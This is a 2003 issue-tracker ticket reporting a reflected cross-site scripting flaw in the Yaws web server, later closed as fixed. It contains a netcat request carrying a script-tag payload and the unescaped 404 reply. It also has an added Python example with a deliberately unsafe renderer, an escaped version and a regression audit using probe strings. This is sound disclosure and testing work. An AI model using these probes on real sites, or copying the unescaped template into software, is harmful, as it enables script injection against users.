#2 Yaws is vulnerable to XSS

Status: closed-fixed
Owner: nobody
Labels: None
Priority: 5
Updated: 2003-06-02
Created: 2003-03-03
Creator: Anonymous
Private: No

Yaws is vulnerable to all kinds of Cross Site Scripting

$ echo -e 'GET /<script>alert("pouet");</script> HTTP/1.0\r\n\r\n' | nc localhost 8080
HTTP/1.1 404 Not Found
Connection: close
Server: Yaws/1.0 Yet Another Web Server
Date: Mon, 03 Mar 2003 05:25:42 GMT
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML
2.0//EN"><HTML><HEAD><TITLE>404 Not
Found</TITLE></HEAD><BODY><H1>Not Found</H1>The
requested URL /<script>alert("pouet");</script> was not
found on this server.<P><HR><address> Yaws 1.0 Server
at toto:8080 </address> </BODY></HTML>
$
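
Added example, not part of the original report and not Yaws code: the 404 body from the response above built once with the request path copied in verbatim and once with it HTML-escaped, plus a regression check that flags raw reflection. All function names, the extra probe strings and the escaping of the server line are assumptions made for illustration.

```python
import html

# Error-page template modelled on the response body shown in the report.
TEMPLATE = (
    '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">'
    "<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>"
    "The requested URL {url} was not found on this server.<P><HR>"
    "<address> {server} </address> </BODY></HTML>"
)
SERVER = "Yaws 1.0 Server at toto:8080"

# First probe is the path from the report; the other two are constructed.
PROBES = ['/<script>alert("pouet");</script>', "/<b>x</b>", '/a"b']


def not_found_unsafe(path, server=SERVER):
    """Behaviour seen in the report: the request path is copied in verbatim."""
    return TEMPLATE.format(url=path, server=server)


def not_found_safe(path, server=SERVER):
    """Hardened form: request-derived text is HTML-escaped before output."""
    return TEMPLATE.format(
        url=html.escape(path, quote=True),
        # Escaped too, on the assumption it could be derived from a Host header.
        server=html.escape(server, quote=True),
    )


def reflected_raw(body, probe):
    """True if a probe containing HTML metacharacters appears unescaped."""
    return any(ch in probe for ch in "<>\"'&") and probe in body


def audit(render, probes=PROBES):
    """Return the probes that a 404 renderer reflects without escaping."""
    return [p for p in probes if reflected_raw(render(p), p)]


if __name__ == "__main__":
    print("unsafe renderer reflects:", audit(not_found_unsafe))
    print("safe renderer reflects:  ", audit(not_found_safe))
```
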

Discussion

  • Claes Wikstrom
    2003-06-02

    • status: open --> closed
     
  • Claes Wikstrom
    2003-06-02

    • status: closed --> closed-fixed